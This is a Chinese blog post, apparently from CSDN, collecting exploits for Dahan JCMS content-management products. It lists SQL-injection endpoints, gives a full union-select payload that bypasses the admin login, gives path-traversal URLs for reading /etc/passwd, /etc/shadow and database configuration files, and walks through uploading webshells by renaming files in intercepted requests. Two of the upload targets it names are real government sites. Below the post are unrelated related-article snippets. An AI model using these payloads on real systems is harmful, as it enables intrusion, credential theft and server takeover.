spellchecker.php 漏洞,整理一些大汉版通的漏洞

最新推荐文章于 2023-07-12 11:22:07 发布
最新推荐文章于 2023-07-12 11:22:07 发布
阅读量2k 收藏
点赞数 1
文章标签: spellchecker.php 漏洞

1.sql注入

/vc/vc/interface/index/que_scount.jsp?webid=1

/jcms/short_message/que_contact.jsp?vc_searchname=1

/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a

/jcms/workflow/design/que_model.jsp?userid=

/jcms/workflow/objectbox/selectx_search.jsp?spell=1

/jcms/workflow/objectbox/selectx_list.jsp?id=1

/jcms/workflow/objectbox/selectx_search.jsp?spell=jcms

/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a

/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa

/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D

/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1

/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa

/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1

/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&nodecode=3&handlerid=4&flowcode=2

/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1

/jcms/m_5_e/init/download/downfile.jsp?filename=1

/jsearch/objectbox/selectx_search.jsp?spell=jsearch

/jphoto/objectbox/selectx_search.jsp?spell=1

/jis/objectbox/selx_userlist.jsp?fn_Keywords=1

/jis/objectbox/selx_search.jsp?spell=jis

/jis/objectbox/selx_list.jsp?id=1

/jis/manage/datasbase/closeup.jsp?id=1

/jis/manage/datasbase/startup.jsp?id=1

/xxgk/workflow/objectbox/selectx_list.jsp?id=1

/xxgk/workflow//statistics/que_apply_sta.jsp?userid=0&modelname=1&modelname1=2

/xxgk/short_message/que_recemsg.jsp?que_keywords=1&loginid=1&boxtype=1&que_keywords1=1&que_startdate=1&que_enddate=1

/module/sitesearch/index.jsp?columnid=81

/module/rss/rssfeed.jsp?colid=23

/vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords=

/zfxxgk/serviceobjectinfo.jsp?servicebm=

/zfxxgk/subjectinfo.jsp?subjectbm=

1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。

2. 利用测试:

后台登录页:http://www.target.com/jcms/

用户名:

[php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--[/php]

密码:1

其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。

2.任意文件读取

/xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt

/jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//proc/self/environ

/vc/vc/columncount/tem/downfile.jsp?filename=/etc/passwd&savename=down.txt

/jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass

/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini

/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml

/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml

/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig

3.上传getshell漏洞

太多,无法一一列举

1.jcms

将如下代码保存为htm

[php]

[/php]

Path : /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+uploadname

打开便可直接上传任意的文件,文件上传后,路径为:

[php]

/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+你上传的文件名[/php]

2.vc

于是我们构造以下Exp 便可直接获取shell

[php]

[/php]

保存为htm 便可直接上传任意文件,

构造zip压缩包,images 文件夹中为我们的shell,default.html 中包含 、

解压的路径为:/vc/vc/html/upload/shell/images/文件名

3.jcms

jcms/setup/opr_upload.jsp

该功能为导入一个zip后缀的更新包...最后会将马解压到目录中update中

/jcms/update

4.xxgk

http://xxgk.lyg.gov.cn//xxgk/m_5_e/module/review/opr_review_template.jsp

打开此页面后,直接上传我们的shell.zip,点击提交即可在服务器上解压并生成Customize.jsp

/xxgk/jcms_files/jcms1/web0/site/zfxxgk/letterbox/template/-1/Customize.jsp

注:经过多个测试,一般情况都为此路径,极少部分 有可能会更改jcms1 web0后面的数字

5./xxgk/m_6_1/opr_modal.jsp

step1 将我们要上传的users.jsp重命名为user.htm

step2 上传时抓包,将user.htm再次命名为user.jsp即可

点击GO 即可在下面目录生成user.jsp

/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/你的文件名

注意:由于代码中上传文件的路径为:

"/jcms_files/jcms" + strAppID + "/web" + nWebID+ "/site/zfxxgk/ysqgk/modal/" + strModaltype + "/"+ 文件名;

所以路径可能要做适当的更改.@@@

http://xxgk.site.cn/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/users.jsp

6./xxgk/m_5_7/replace/opr_importinfo.jsp

First:首先将我们要上传的文件改名为shell.xml,之后抓包再改回来..

在验证之前简单说下比较有意思的地方,当我们点击上传的时候,采用Burp suite抓包修改,提交即可

有两处需要修改的地方:

Content-Disposition: form-data; name="file1"; filename="shell.xml"

Content-Disposition: form-data; name="file3"; filename="shell.jsp"

注意:name必须修改为非file1,要不然无法成功上传(这里就是我觉得比较有意思的地方)

提交后会就会在 /m_5_7/replace/temp/ 目录下生成shell.jsp

http://xxgk.weifang.gov.cn/xxgk/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1

7./xxgk/m_5_5/m_5_5_3/import_style.jsp

我们将xiao.jspx 改名为xiao.xml 上传..

提交后抓包修改文件名为1.jspx即可

此时已经在 /m_5_5/m_5_5_3/temp/upload/ 目录下生成了xiao.jspx 访问下 成功

/xxgk//m_5_5/m_5_5_3/temp/upload/xiao.jspx

8.截断上传

[php]

[/php]

[php]

[/php]

weixin_39990819
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php-spell-checker:俄语和英语文本的拼写检查
06-21
拼写检查程序 hunspell 命令行实用程序的包装类。 对于 Ubuntu 安装包: sudo apt-get install hunspell sudo apt-get install myspell-ru 用法示例: require 'SpellChecker.php' $ checker = new SpellChecker (); $ checker -> spellCheckString ( SpellChecker :: LANG_EN , 'abracadabra valid iinnnvalid' );
php爆绝对路径的几种方法
weixin_30905981的博客
04-27 342
dz 爆绝对路径/uc_server/control/admin/db.php/ucenter/control/admin/db.php/manyou/admincp.php?my_suffix=%0A%0DTOBY57/manyou/userapp.php?%0D%0A=TOBY57WordPress的平台,爆绝对路径的方法是:url/wp-admin/includes/admin....
如何实现单词拼写检查 (spellChecker) ?
weixin_34099526的博客
01-08 1155
前两天,有位同事提到她做过的一个功能,在线实现单词检查,若单词有误,给出建议清单,她使用的方法是下载单词库,转为xml,在VB.NET中使用查找与loop,并且要支持多语种。我当时听到,觉得应该有更快的方法,就查了查,果然让我查到已有人开发出使用jQuery调用Google Dictionary API的现成方法, Demo: http://spellchecker.jquery.badsynta...
spellcheck php,html5规定是否对元素进行拼写和语法检查的属性spellcheck
weixin_32208021的博客
03-21 232
实例进行拼写检查的可编辑段落:这是一个段落。浏览器支持IE、Firefox、Chrome、SafariOpera定义和用法spellcheck 属性规定是否对元素进行拼写和语法检查。可以对以下内容进行拼写检查:input 元素中的文本值(非密码) 元素中的文本可编辑元素中的文本HTML 4.01 与 HTML5 之间的差异spellcheck 属性是 HTML5 中的新属性。语法属性值值描述tru...
Fckeditor漏洞整理集合
E4857632的博客
08-23 976
1、查看编辑器版本 /fckeditor/editor/dialog/fck_about.html 2、爆绝对路径 FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀) /FCKeditor/editor/filemanager/bro...
简单粗暴的文件上传漏洞
hl1293348082的专栏
05-30 1490
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。 特点 1、利用简单 2、危害大 产生原因 缺少必要的校验 代码审计 基础 关于 PHP 中 $_FILES 数组的使用方法 $_FILES[‘file’][‘name’] 客户端文件名称 $_FILES[‘file’][‘type’] 文件的
spellchecker.php 漏洞,CVE-2013-3630 Moodle Spellcheck 远程命令执行漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_32586767的博客
04-13 640
### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require 'rexml/document'class Metasploit4 < Msf...
漏洞复现 || eGroupWare spellchecker.php 远程命令执行漏洞
失心少年
07-12 1122
我爱林的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!eGroupWare是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装。nc反弹最好将命令通过url编码后替换即可。1.使用POC执行id命令,得到回显。
spellchecker.php,将Spellchecker整合到Tinymce中不起作用
weixin_35812176的博客
03-17 193
在我的应用程序中,我使用了tinymce编辑器来处理textareas .我想为它集成一个拼写检查器,所以我下载了拼写检查器的插件并将其放入插件文件夹中 .接下来我更改了代码:tinyMCE.init({// General optionsmode : "textareas",theme : "advanced",plugins : "advlink,paste,spellchecker",// ...
php中关于fckeditor的详细配置
weixin_34233679的博客
03-25 123
因为下载下来的压缩包里面有包含很多在我们使用时,用不到的,不删除也行。看个人喜好下面以PHP为例,进行程序瘦身 删除所有”_”开头的文件和文件夹 删除FCKeditor的目录下: fckeditor.afp fckeditor.asp fckeditor.cfc fckeditor.cfm fckeditor.lasso fckeditor.pl fckeditor....
node-aspell-spellchecker:php的节点替换需要jquery-spellchecker的Web服务
05-09
节点拼写检查器 php的节点替换需要jquery-spellchecker的Web服务 要求: 咒语 节点v0.10.x jquery-spellchecker( ) 快递v3.2.x 如何安装: npm install node-aspell-spellchecker 如何使用: 替换拼写检查实例化路径: var spellchecker = new $.SpellChecker('textarea', { lang: 'en', parser: 'text', webservice: { path: '../../webservices/php/SpellChecker.php', driver: 'pspell' }, suggestBox: { position: 'above' }, incorrectWords: {
spell-checker.js:简单的可扩展工具,用于拼写检查
05-27
Spell-checker.js 简单的可扩展工具,用于拼写检查 自述: English 支持的语言 英语 俄语 快速开始 安装: npm i spell-checker-js ...spell.load(dictionary)或spell.load(options) —加载字典文件 例子: //
VisualStudio.SpellChecker.VS2013And2015.vsix
05-13
VisualStudio.SpellChecker.VS2013And2015.vsix——VisualStudio.SpellChecker.VS2013And2015.vsix——VisualStudio.SpellChecker.VS2013And2015.vsix
SpellChecker.vsix
02-25
轻量级单词差错插件
Secor. Spell checker.-开源
07-11
Secor 是一个交互式拼写检查系统。 它旨在测试一种使用 Trigram 方法作为过滤器来减小字典大小的技术。 选择完成后,将使用编辑距离方法对单词列表进行排序。
安卓开发-SpellChecker.zip
11-18
安卓开发-SpellChecker.zip
CMS漏洞总结
include_voidmain的博客
08-01 4626
CMS漏洞总结
Fckeditor漏洞总结
fengling132的专栏
04-20 1438
FCk的漏洞,本文会增加自己的经验以及网络收集的漏洞,集百家之所长。 1、查看编辑器版本 FCKeditor/_whatsnew.html  FCKeditor/editor/dialog/fck_about.html 2、Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 3、Version http://www.hackseo.n
Code Spell Checker
最新发布
07-27
Code Spell Checker是一个用于检查代码中拼写错误的插件。当它检测到不是标准的英文单词时,会报错。为了避免这种情况影响代码编写体验,可以对该插件进行配置,让它在遇到特定词汇时不报错。在VSCode中进行配置的步骤如下: 1. 打开设置(Settings)。 2. 打开setting.json文件。 3. 在setting.json文件中添加以下代码:"cSpell.userWords": \["axios", 更多词汇...\]。 另外,还可以通过修改Code Spell Checker的settings.json文件来添加错误的单词。具体操作如下: 1. 打开设置(Settings)。 2. 打开用户(User)。 3. 打开扩展(Extensions)。 4. 找到安装的Code Spell Checker并打开settings.json。 5. 在其中找到图6的内容。 6. 修改其中的内容,添加错误的单词。例如,可以添加bindblur单词。 如果是在工作区添加单词到词典中,可以在VSCode的项目文件夹中的.vscode文件夹下的settings.json文件中进行修改。以上是解决Code Spell Checker报错的一些方案。 #### 引用[.reference_title] - *1* [code spell checker插件规避掉一些特定词汇报错“xxx“: Unknown word.cSpell](https://blog.csdn.net/angrynouse/article/details/125846273)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [VSCode中插件Code Spell Checker](https://blog.csdn.net/qq_42078081/article/details/115014474)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值